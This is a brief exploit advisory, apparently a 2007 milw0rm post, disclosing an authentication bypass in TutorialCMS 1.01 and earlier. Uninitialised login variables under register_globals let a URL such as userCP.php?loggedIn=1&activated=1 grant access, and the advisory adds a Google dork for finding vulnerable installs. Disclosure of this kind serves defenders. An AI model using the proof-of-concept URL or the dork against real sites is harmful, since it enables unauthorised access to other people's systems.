37 lines
No EOL
1.2 KiB
Text
37 lines
No EOL
1.2 KiB
Text
#################################################################################
|
|
# #
|
|
# TutorialCMS <= 1.01 Authentication Bypass #
|
|
# #
|
|
# Discovered by: Silentz #
|
|
# Payload: Authentication Bypass #
|
|
# Website: http://www.w4ck1ng.com #
|
|
# #
|
|
# Vulnerability: #
|
|
# #
|
|
# Variables $loggedIn & $activated are not predefined. #
|
|
# #
|
|
# Vulnerable Files: #
|
|
# #
|
|
# login.php #
|
|
# headerLinks.php #
|
|
# submit1.php #
|
|
# myFav.php #
|
|
# userCP.php #
|
|
# #
|
|
# #
|
|
# PoC: http://victim.com/tutorialcms/userCP.php?loggedIn=1&activated=1 #
|
|
# #
|
|
# Subject To: register_globals set to on #
|
|
# GoogleDork: "Powered By Photoshop Tutorials" #
|
|
# #
|
|
# Shoutz: The entire w4ck1ng community #
|
|
# #
|
|
# Notes to developers: #
|
|
# #
|
|
# You should allways fully disclose the vulnerabilities before someone #
|
|
# else does, just looks better. Also, try changing the "Date Modified" #
|
|
# stamp on the files before you wrap it up for upload ;) #
|
|
# #
|
|
#################################################################################
|
|
|
|
# milw0rm.com [2007-05-21] |